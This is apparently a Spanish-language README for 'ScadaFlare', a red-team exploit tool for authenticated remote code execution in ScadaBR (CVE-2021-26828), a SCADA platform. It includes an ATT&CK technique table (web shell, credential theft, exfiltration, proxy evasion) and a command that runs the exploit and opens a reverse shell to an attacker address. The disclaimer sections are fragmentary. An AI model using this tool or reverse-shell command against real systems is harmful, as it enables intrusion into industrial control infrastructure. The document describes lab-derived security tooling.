
ScadaFlare Framework de explotación RCE autenticado para ScadaBR (CVE-2021-26828) OpenPLC ScadaBR
Exploit modular de RCE post-autenticación dirigido a ScadaBR <1.1.0, mejorado para operaciones de red team.

.jsp armada a través de view_edit.shtm| Fase | Técnica | ID |
|---|---|---|
| Acceso inicial (post-autenticación) | Cuentas válidas | T1078 |
| Ejecución | Explotación de aplicación expuesta al público | T1190 |
| Ejecución de comandos | Web Shell | T1505.003 |
| Acciones de privilegios | Modificar contenido web | T1505 |
| Acceso a credenciales | Credenciales en archivos de configuración | T1552.001 |
| Descubrimiento | Descubrimiento remoto de sistemas | T1018 |
| Exfiltración | Exfiltración a través de servicio web | T1567.002 |
| Evasión de defensas | Proxy y tunelización de protocolo | T1090 |
Este exploit se desarrolló durante el análisis del escenario HTB Pro Lab: Alchemy. El PoC original de Fellipe Oliveira era sólido, pero:
Esta versión, ScadaFlare, es una reescritura completa en Python 3 con soporte modular, múltiples estrategias de evasión, anulación de la detección de SO, integración de webhooks, soporte de proxy SOCKS y cadenas de enumeración para uso operativo en el mundo real.
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare está diseñado únicamente para:
El uso no autorizado contra sistemas industriales reales puede:
Al usar esta herramienta aceptas toda la responsabilidad de:
Licencia MIT – consulta LICENSE